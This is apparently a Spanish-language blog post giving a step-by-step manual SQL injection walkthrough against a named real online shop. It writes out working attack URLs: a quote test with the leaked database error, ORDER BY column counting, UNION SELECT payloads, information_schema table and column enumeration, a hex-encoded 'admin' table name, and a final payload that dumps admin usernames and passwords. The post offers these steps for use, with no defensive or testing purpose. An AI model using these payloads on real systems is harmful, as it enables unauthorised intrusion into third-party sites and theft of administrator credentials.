buscamos la pagina vulne.. para hacerle la inyeccion manual no soy muy muy bueno hablando mucho empezemos
colocamos una comilla (') para saber si es vulnerable a inyeccion SQL haci
http://www.aviacionshop.com.ar/ficha.php?id='8
mysql_fetch_assoc () espera parámetro de 1 a ser el recurso, boolean given en /www/zucodavid/aviacion/ficha.php en la línea 26
ponemos en el navegador y ponemos "order by 1" hasta encontrar el error
"order by 1"
"order by 10"
"order by 13"
"order by 8" <--- el numero de la base de dato
http://www.aviacionshop.com.ar/ficha.php?id=-8+order+by+16/*
entonces ponemos "union+ select+ hasta el 8"
http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+1,2,3,4,5,6,7,8
pues como vemos nos tiro la el numero "6" pues ahora penetramos por ese numero que nos lanzo
en el numero "6" ponemos esto "replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29" y al
final entonce ponemos " +from+information_schema.tables--
"
quedara haci
http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+ 1,2,3,4,5,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29,7,8+ +from+information_schema.tables--
como vemos nos acaba de mostrar su "Database"
"Database"
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE PARAMETERS PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS TABLES TABLESPACES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS INNODB_BUFFER_PAGE INNODB_TRX INNODB_BUFFER_POOL_STATS INNODB_LOCK_WAITS INNODB_CMPMEM INNODB_CMP INNODB_LOCKS INNODB_CMPMEM_RESET INNODB_CMP_RESET INNODB_BUFFER_PAGE_LRU admin banner galeria textos admin banners categorias clientes envio orden_detalles ordenes pago productos textoa -------------- bueno aqui como vemos nos mostro toda la Database lo que nos interesa es el "admin"entramos a esta pagina para convertir nuestro admin en "Hex" que serian unos codigos para luego penetrar http://www.swingnote.com/tools/texttohex.php este seria el codigo Hex: "61646d696e" ahora ahora borramos esta linea replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 y lo remplazamos por "column_name" remplazamos (from+information_schema.tables) por esto mas con el codigo de admin columns+where(table_name=0xa el codigo ba aqui )limit+1,1-- columns+where(table_name=0x61646d696e)limit+1,1-- quedaria haci http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+ 1,2,3,4,5,+column_name,7,8+ +from+information_schema.columns+where(table_name=0x61646d696e)limit+1,1-- entonce vamos buscando cambiando el "limit+1,1"-- "limit+1,2"-- "limit+1,3"-- en cada uno de esos numero nos aparecera ya sea "Email" ,oh "username" password" ect lo gramos encontrar el "username y password" que es la que nos interesa ahora remplazamos "column_name" por group_concat(password,0x3a,username ) http://www.aviacionshop.com.ar/ficha.php?id=-896+UNION+SELECT+ 1,2,3,4,5,+ group_concat(password,0x3a,username ),7,8+from admin--+ nos debe mostrar el username y el passwor |
0 comentarios:
Publicar un comentario